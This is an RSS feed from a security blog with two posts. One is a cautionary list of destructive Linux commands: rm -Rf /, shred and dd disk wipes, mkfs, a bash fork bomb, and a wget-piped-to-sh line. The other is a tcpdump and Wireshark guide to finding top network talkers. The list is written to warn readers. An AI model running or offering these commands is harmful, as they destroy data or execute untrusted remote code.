<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>unix Archives - ITBlogSec.com</title>
	<atom:link href="https://itblogsec.com/tag/unix/feed/" rel="self" type="application/rss+xml" />
	<link>https://itblogsec.com/tag/unix/</link>
	<description>IT, network, security and hacking</description>
	<lastBuildDate>Mon, 04 May 2020 14:10:17 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>
	<item>
		<title>10 most dangerous linux commands you should never run</title>
		<link>https://itblogsec.com/10-dangerous-linux-commands-never-run/</link>
					<comments>https://itblogsec.com/10-dangerous-linux-commands-never-run/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 16 Jun 2017 19:36:50 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[unix]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=910</guid>

					<description><![CDATA[<p>There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.</p>
<p>The post <a href="https://itblogsec.com/10-dangerous-linux-commands-never-run/">10 most dangerous linux commands you should never run</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>10 most dangerous linux commands you should never run</h2>
<p style="text-align: justify;">There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.</p>
<h3>Irreversible Linux Commands – The Most Dangerous Ones</h3>
<pre class="lang:default decode:true">rm -Rf /</pre>
<p style="text-align: justify;">This command has gained a lot of notoriety and is particularly dangerous. Thankfully, many UNIX systems have placed a safeguard into the rm command to ensure that it doesn’t happen accidentally. It might be hard to believe that something so destructive could be run by accident, but it’s really as simple as using an uninitialized variable in a BASH script and not checking it before running the command.</p>
<pre class="lang:default decode:true">shred /dev/sda</pre>
<p style="text-align: justify;">Shred is a particularly dangerous command. Unlike with rm, where anyone with some data recovery knowledge can carve the volume for important files, shred does exactly what the name suggests. It reads from the operating system’s /dev/random or /dev/urandom to generate random data, which is then used to overwrite the drive in several passes, rendering the data irretrievable. Even if you manage to interrupt the process before it gets through too much of your data, you’ll still have to rebuild your partition table and repair any filesystems that were touched. Shred is certainly a dangerous command if not used carefully.</p>
<pre class="lang:default decode:true">dd if=/dev/random of=/dev/sda</pre>
<p style="text-align: justify;">dd is an amazingly useful tool. It can be used for cloning volumes and filesystems, writing images to disks, and even erasing drives. The above dd command accomplishes roughly the same as shred, the only differences being that shred is much faster and does multiple passes by default.</p>
<pre class="lang:default decode:true">mkfs.ext4 /dev/sda1</pre>
<p style="text-align: justify;">As Picasso said, “every act of creation is first an act of destruction,” and the same is true with mkfs. The fault here doesn’t lie with ext4 particularly, only that in order to create a new filesystem you must discard all existing data on the volume. This obviously isn’t a trouble on a shiny new disk, but it can bring a running system to its knees if it’s used without discretion.</p>
<pre class="lang:default decode:true">mv / /dev/null</pre>
<p style="text-align: justify;">This one is on par with our first. Anything written to /dev/null is accepted and discarded, so this command is effectively the same as our first, although it might take longer to accomplish.</p>
<h3>Dangerous, Although Reversible Linux Commands</h3>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">:(){:|:&amp;};:</pre>
<p style="text-align: justify;">This cryptic string is BASH wizardry at its most evil and arcane. It is known by the common name of the BASH Fork Bomb; its other names are Rabbit Virus or Wabbit. Its construction is elegant and deadly, bringing any system to a halt if the proper security measures aren’t in place. The command creates a function named : with the :() at the beginning, then defines the body of the function with {:|:&amp;}, which simply calls the function itself and pipes the output into another call of itself while backgrounding the process. Finally, the function definition is terminated with the ; and the function is called with the trailing :. To defend against this type of attack you need to implement precautions (per-user process limits) in the /etc/security/limits.conf configuration file.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">wget http://unknownsource.com/possiblydangerous.sh -O- | sh</pre>
<p style="text-align: justify;">This one should be a no-brainer. While wget is a useful tool, anything you download, especially executables, should be inspected if it comes from an unknown or untrusted source. This command downloads the script and pipes it straight into sh, which is usually just a symbolic link to BASH, so anything in the script will be executed with whatever privilege the user has. The script could quite possibly contain any of the previously mentioned commands.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">gunzip untrusted.gz</pre>
<p style="text-align: justify;">The seldom known Decompression Bomb is pretty unique in its approach. Compression relies on order in the data to achieve high ratios; a file filled entirely with ones or zeros can therefore be compressed to a very high ratio, and the resulting file can be orders of magnitude smaller than the original. That is exactly what a Decompression Bomb is: a file that, when decompressed, fills the available disk space. On a Linux machine this can be fatal to many system services that need to log or write to a file. For that reason, decompressing any untrusted file can be very dangerous.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">command &gt; file.conf</pre>
<p style="text-align: justify;">The redirection feature of BASH is extremely useful, but when it’s used without care it can wipe out an important configuration file. Remembering to distinguish between &gt; and &gt;&gt;, replace and append, can be difficult for a beginner, and even professionals overlook it and lose files. That’s why you should always double check, or even triple check, the commands you run.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">^mistake^correction</pre>
<p style="text-align: justify;">This is a history substitution that corrects a mistake made in the previous command. It’s not something to keep at the top of your toolbox, but it is particularly handy when re-running long commands. The danger comes from the fact that it can substitute malicious content into previously run commands, so it’s especially important to inspect both the previous command and the substitution.</p>
<p><span style="color: #ff0000;"><strong>| READ ALSO:</strong></span> <a href="https://itblogsec.com/how-to-put-currently-running-process-to-background/" target="_blank" rel="noopener">How to put currently running process to background</a></p>
</div>
</div>
<p style="text-align: justify;">Surely, there are many more commands that can disrupt or permanently impair a system. Did we miss any big ones? Do you know of any obscure ones? Let us know in the comments below.</p>
<p><span style="font-size: 10pt;"><strong>source: </strong><a href="https://fossbytes.com" target="_blank" rel="noopener">https://fossbytes.com</a></span></p>
<p>The post <a href="https://itblogsec.com/10-dangerous-linux-commands-never-run/">10 most dangerous linux commands you should never run</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/10-dangerous-linux-commands-never-run/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to find out TOP talkers in your network</title>
		<link>https://itblogsec.com/top-talkers-by-using-tcpdump/</link>
					<comments>https://itblogsec.com/top-talkers-by-using-tcpdump/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 30 Dec 2016 22:44:59 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[tcpdump]]></category>
		<category><![CDATA[top talkers]]></category>
		<category><![CDATA[unix]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=21</guid>

<description><![CDATA[<p>Sometimes it is very useful to find out the current top talkers in your network. You can figure out what is going on and which IP may be the source of congestion.</p>
<p>The post <a href="https://itblogsec.com/top-talkers-by-using-tcpdump/">How to find out TOP talkers in your network</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>How to find out TOP talkers in your network</h2>
<p style="text-align: justify;">Sometimes it is very useful to find out the current top talkers in your network that are affecting your local interface. You can figure out what is going on and which IP may be the source of congestion.</p>
<h3>UNIX/LINUX procedure</h3>
<p>Issue the following command; the -c parameter sets the number of packets to capture and the -i parameter specifies the interface to sniff on:</p>
<pre class="lang:default decode:true">sudo tcpdump -tnn -c 40 -i eth0  | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | head</pre>
<div id="attachment_369" style="width: 1108px" class="wp-caption alignnone"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-369" class="border-image wp-image-369 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/top_talkers.jpg" width="1098" height="161" srcset="https://itblogsec.com/wp-content/uploads/2016/12/top_talkers.jpg 1098w, https://itblogsec.com/wp-content/uploads/2016/12/top_talkers-300x44.jpg 300w, https://itblogsec.com/wp-content/uploads/2016/12/top_talkers-768x113.jpg 768w, https://itblogsec.com/wp-content/uploads/2016/12/top_talkers-1024x150.jpg 1024w" sizes="(max-width: 1098px) 100vw, 1098px" /><p id="caption-attachment-369" class="wp-caption-text">Output of analyzing 40 packets</p></div>
<h3>WINDOWS procedure</h3>
<p style="text-align: justify;">In Windows we will use the well-known application <a href="https://www.wireshark.org/download.html">Wireshark</a>. Normally a network interface only &#8220;receives&#8221; packets directly addressed to it. Promiscuous mode allows the interface to receive all packets it sees, whether they are addressed to it or not. By enabling promiscuous mode on the interface you can easily sniff traffic and, based on further analysis, figure out which host is the likely top talker. This is very useful when you are experiencing some kind of broadcast (or multicast) storm and want to identify the source of the congestion.</p>
<div id="attachment_379" style="width: 1146px" class="wp-caption alignnone"><img decoding="async" aria-describedby="caption-attachment-379" class="border-image wp-image-379 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01.png" width="1136" height="582" srcset="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01.png 1136w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01-300x154.png 300w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01-768x393.png 768w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01-1024x525.png 1024w" sizes="(max-width: 1136px) 100vw, 1136px" /><p id="caption-attachment-379" class="wp-caption-text">Selection of interface and starting packets capture</p></div>
<p><span style="color: #ff0000;">1. Click the button to open the capture interface settings<br />
</span><span style="color: #ff0000;">2. Select the interface you want to capture traffic on<br />
</span><span style="color: #ff0000;">3. Click the &#8220;Start&#8221; button to start capturing</span></p>
<div id="attachment_381" style="width: 1257px" class="wp-caption alignnone"><img decoding="async" aria-describedby="caption-attachment-381" class="border-image wp-image-381 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03.png" width="1247" height="397" srcset="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03.png 1247w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03-300x96.png 300w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03-768x245.png 768w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03-1024x326.png 1024w" sizes="(max-width: 1247px) 100vw, 1247px" /><p id="caption-attachment-381" class="wp-caption-text">Stopping capture and selecting Conversations</p></div>
<p><span style="color: #ff0000;">4. After a few seconds you can &#8220;Stop&#8221; capturing traffic</span><br />
<span style="color: #ff0000;">5. Select &#8220;Statistics&#8221;</span><br />
<span style="color: #ff0000;">6. Choose &#8220;Conversations&#8221;</span></p>
<div id="attachment_384" style="width: 1017px" class="wp-caption alignnone"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-384" class="border-image wp-image-384 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04.png" width="1007" height="241" srcset="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04.png 1007w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04-300x72.png 300w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04-768x184.png 768w" sizes="(max-width: 1007px) 100vw, 1007px" /><p id="caption-attachment-384" class="wp-caption-text">Conversations dialog where you can filter and see full statistics of captured packets</p></div>
<p style="text-align: justify;">Simply by selecting the desired port and ordering by &#8220;Bytes&#8221; you can see the source/destination IP that is originating the most traffic. Keep in mind that you will not see all traffic in your network, but you can capture traffic that is not addressed directly to your interface yet still affects your network performance (e.g. a broadcast storm).</p>
<p>The post <a href="https://itblogsec.com/top-talkers-by-using-tcpdump/">How to find out TOP talkers in your network</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/top-talkers-by-using-tcpdump/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
